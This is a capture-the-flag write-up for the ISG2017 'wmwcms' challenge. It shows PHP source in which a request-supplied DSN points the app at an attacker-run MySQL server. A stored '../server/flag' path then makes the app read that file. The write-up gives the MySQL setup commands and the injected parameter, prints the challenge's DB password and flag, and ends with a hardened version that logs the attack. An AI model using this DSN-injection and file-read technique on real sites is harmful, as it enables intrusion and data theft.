ISG2017-wmwcms-writeup

Task

Can u conquer this crude cms and get flag?
link: http://202.120.7.204:7242

Solution

Checking robots.txt reveals a zip archive; downloading it gives us the source code.

The file layout is as follows:

public/app.php:

<?php
try {
    session_start();
    define('APP_PATH', dirname(dirname(__FILE__)) . '/server/');
    error_reporting(0);
    include_once APP_PATH . 'sql.php';
    include_once APP_PATH . 'func.php';
    if (!isset($_GET["action"])) {
        errormsg("action is required.");
    }
    $actions = ["login", "logout", "img"];
    if (!in_array($_GET["action"], $actions)) {
        errormsg('Hacking attempt');
    }
    include APP_PATH . $_GET["action"] . ".php";
} catch (Exception $e) {
}

server/img.php

<?php
include_once 'sql.php';
if(!isset($_SESSION['uid'])) {
    $portrait = "img/user.png";
} else {
    $uid = intval($_SESSION['uid']);
    $sql = "select portrait from user where id = ?";
    $sth = $dbh->prepare($sql);
    $sth->execute([$uid]);
    $user = $sth->fetchAll();
    if(count($user) > 0){
        $user = $user[0];
        $portrait = $user["portrait"];
    } else {
        $portrait = "img/user.png";
    }
}
header("Cache-Control: max-age=1, s-maxage=1, no-cache, must-revalidate");
header("Content-type: image/png;charset=gb2312");
echo file_get_contents($portrait);

server/sql.php

<?php
include_once 'func.php';
if (isset($_REQUEST['dsn'])){
    $dsn = $_REQUEST['dsn'];
} else{
    $dsn = "wmwcms";
}
$dsn = "mysql:dbname={$dsn}";
$username = 'wmwcms';
$password = '%glVYKTkLtQ22';
$options = array(
    PDO::MYSQL_ATTR_INIT_COMMAND => 'SET names utf8',
);
$dbh = new PDO($dsn, $username, $password, $options);

First, make the database reachable from outside: edit /etc/mysql/mysql.conf.d/mysqld.cnf and comment out the line bind-address = 127.0.0.1.

Next, set up MySQL. I log in as root here:

mysql> USE wmwcms;
Database changed
mysql> CREATE TABLE `user` (
    -> `id` INT AUTO_INCREMENT,
    -> `name` VARCHAR(100) NULL,
    -> `pwd` VARCHAR(64) NOT NULL,
    -> `portrait` VARCHAR(64) DEFAULT "../server/flag",
    -> PRIMARY KEY (`id`),
    -> UNIQUE KEY `Duplicate_name` (`name`)
    -> ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
Query OK, 0 rows affected (0.19 sec)
mysql> INSERT INTO `user` (`name`, `pwd`) values ("test", "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3");
Query OK, 1 row affected (1.06 sec)
mysql> select id,name,pwd,portrait from user;
+----+------+------------------------------------------+----------------+
| id | name | pwd                                      | portrait       |
+----+------+------------------------------------------+----------------+
|  1 | test | a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 | ../server/flag |
+----+------+------------------------------------------+----------------+
1 row in set (0.00 sec)

Then create the wmwcms user; the % after the @ means it is allowed to log in remotely:

mysql> CREATE USER 'wmwcms@%' IDENTIFIED BY "%glVYKTkLtQ22";
Query OK, 0 rows affected (2.35 sec)

And grant it privileges:

mysql> grant all privileges on wmwcms.* to 'wmwcms'@'%' identified by '%glVYKTkLtQ22';
Query OK, 0 rows affected, 1 warning (0.03 sec)

Now, when the GET parameter we pass is dsn=wmwcms;host=yourvps;port=yourport, the PDO object in the backend's sql.php connects to your remote database. When img.php then runs, the portrait it fetches is the portrait field from our database, which here is ../server/flag. Execution continues to echo file_get_contents($portrait);, which now effectively runs echo file_get_contents("../server/flag");

Why set the database value to ../server/flag? Note that app.php lives in the public directory, and the default $portrait = "img/user.png" shows that the path is resolved relative to the public folder. From the source we know the flag sits in the server folder, so we have to go up one directory to read it.
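As an added illustration (not code from the challenge), here is the same handler written so that neither weakness exists: the DSN is fixed server-side instead of being built from $_REQUEST, and the portrait path read from the database is confined to the public image directory before it is served. The file layout, the WMWCMS_DB_PASSWORD environment variable and the logging call are my assumptions.

```php
<?php
// Hardened img handler (added example, assumed layout: this file in server/, images in public/img/).
session_start();

const PORTRAIT_DIR = __DIR__ . '/../public/img';

// The DSN never contains request data, so a client cannot redirect PDO to another host.
function buildDsn(): string {
    return 'mysql:host=127.0.0.1;dbname=wmwcms;charset=utf8mb4';
}

// Map a stored portrait value to a file strictly inside PORTRAIT_DIR.
// basename() drops any directory part ("../server/flag" -> "flag"); realpath() then
// only succeeds for a file that really exists under the image directory.
function safePortraitPath(string $portrait): string {
    $base = realpath(PORTRAIT_DIR);
    $fallback = $base . '/user.png';
    $candidate = realpath(PORTRAIT_DIR . '/' . basename($portrait));
    if ($base === false || $candidate === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return $fallback;
    }
    return $candidate;
}

// Detection signal: the legitimate client never sends a dsn parameter, so log any attempt.
if (isset($_REQUEST['dsn'])) {
    error_log('wmwcms: unexpected dsn parameter from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
}

// Password from the environment (assumption), not hard-coded in the repository.
$dbh = new PDO(buildDsn(), 'wmwcms', getenv('WMWCMS_DB_PASSWORD') ?: '', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

$portrait = 'img/user.png';
if (isset($_SESSION['uid'])) {
    $sth = $dbh->prepare('SELECT portrait FROM user WHERE id = ?');
    $sth->execute([intval($_SESSION['uid'])]);
    $row = $sth->fetch(PDO::FETCH_ASSOC);
    if ($row !== false) {
        $portrait = $row['portrait'];
    }
}

header('Cache-Control: no-cache, must-revalidate');
header('Content-Type: image/png');
readfile(safePortraitPath($portrait));
```

With this version a row containing ../server/flag resolves to the default user.png, and a request carrying dsn= leaves a log line instead of changing where the application connects.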

flag:

ISG{a107063477b1dd64dabbcaeebf636f7b}

Title: ISG2017-wmwcms-writeup

Author: chybeta

Published: August 31, 2017 - 16:08

Last updated: August 31, 2017 - 18:08

Original link: http://chybeta.github.io/2017/08/31/ISG2017-wmwcms-writeup/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.